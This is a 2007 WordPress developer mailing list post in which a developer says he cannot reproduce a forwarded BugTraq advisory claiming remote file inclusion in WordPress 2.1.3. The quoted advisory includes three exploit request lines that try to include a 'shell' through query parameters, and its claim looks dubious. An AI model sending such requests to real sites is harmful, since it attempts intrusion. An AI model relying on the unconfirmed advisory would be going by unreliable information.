[wp-hackers] FW: [BugTraq] WordPress v2.1.3 >> remote file
include~
Aaron Brazell
abrazell at b5media.com
Thu Apr 26 01:55:54 GMT 2007
Perhaps I'm missing something here, but I can't duplicate on 2.1.3 or
trunk...
--
Aaron Brazell
Director of Technology, b5media
"A Global New Media Company"
web:: www.b5media.com, www.technosailor.com
phone:: 410-608-6620
skype:: technosailor
On Apr 25, 2007, at 9:37 PM, Ross M. W. Bennetts wrote:
> -----Original Message-----
> From: s433d_only_linux at yahoo.de [mailto:s433d_only_linux at yahoo.de]
> Sent: Wednesday, 25 April 2007 6:18 PM
> To: bugtraq at securityfocus.com
> Subject: WordPress v2.1.3 >> remote file include~
>
> by : www.hackeraz.ir userz , saeid...
> ++++++++++++++++++++++++++++++++++++
> ####################################################
> #WordPress >> 2.1.3 Remote File Inclusion #
> ####################################################
> Affected Software .: WordPress >> 2.1.3 #
> Download..: http://wordpress-deutschland.org #
> Risk ..............: high #
> Date .........: 25/4/2007 #
> Found by ..........: s433d_only_linux #
> Contact ...........: s433d_only_linux at yahoo.de #
> Web .............: Www.hackerz.ir #
> special thanx ........... Ali Jasbi my beste friend#
> ####################################################
> Affected File: #
> wordpress/wp-settings.php #
> wordpress/wp-includes/template-loader.php #
> wordpress/wp-includes/theme.php #
> ####################################################
> Exploit:
> wordpress/wp-settings.php?require_once=shell?
> wordpress/wp-includes/template-loader.php?include=shell?
> wordpress/wp-includes/theme.php?require_once=shell?
> ######################################################
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
More information about the wp-hackers
mailing list